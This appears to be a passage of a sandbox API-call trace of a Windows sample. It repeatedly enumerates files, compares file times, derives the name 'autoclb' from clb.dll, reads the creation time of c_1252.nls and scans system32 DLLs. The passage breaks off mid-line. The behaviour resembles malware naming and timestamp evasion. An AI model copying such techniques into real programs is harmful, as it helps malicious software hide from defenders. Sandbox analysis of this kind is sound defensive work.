FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.909] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.910] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.910] StrChrA (lpStart="clb.dll", wMatch=0x2e) returned=".dll" [0075.911] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.911] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.911] FindClose (in: hFindFile=0x61e9c8 | out: hFindFile=0x61e9c8) returned 1 [0075.911] lstrlenA (lpString="autoclb") returned 7 [0075.911] mbstowcs (in: _Dest=0x2228710, _Source="autoclb", _MaxCount=0xe | out: _Dest="autoclb") returned 0x7 [0075.911] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0075.911] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x2228750, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0075.911] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0075.911] GetFileTime (in: hFile=0x174, lpCreationTime=0x5dfeac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x5dfeac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.911] CloseHandle (hObject=0x174) returned 1 [0075.911] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0075.911] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0075.911] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 0x61e908 [0075.911] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.911] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] StrChrA (lpStart="adsldpc.dll", wMatch=0x2e) returned=".dll" [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.912] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.912] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.913] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.913] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.914] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.914] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 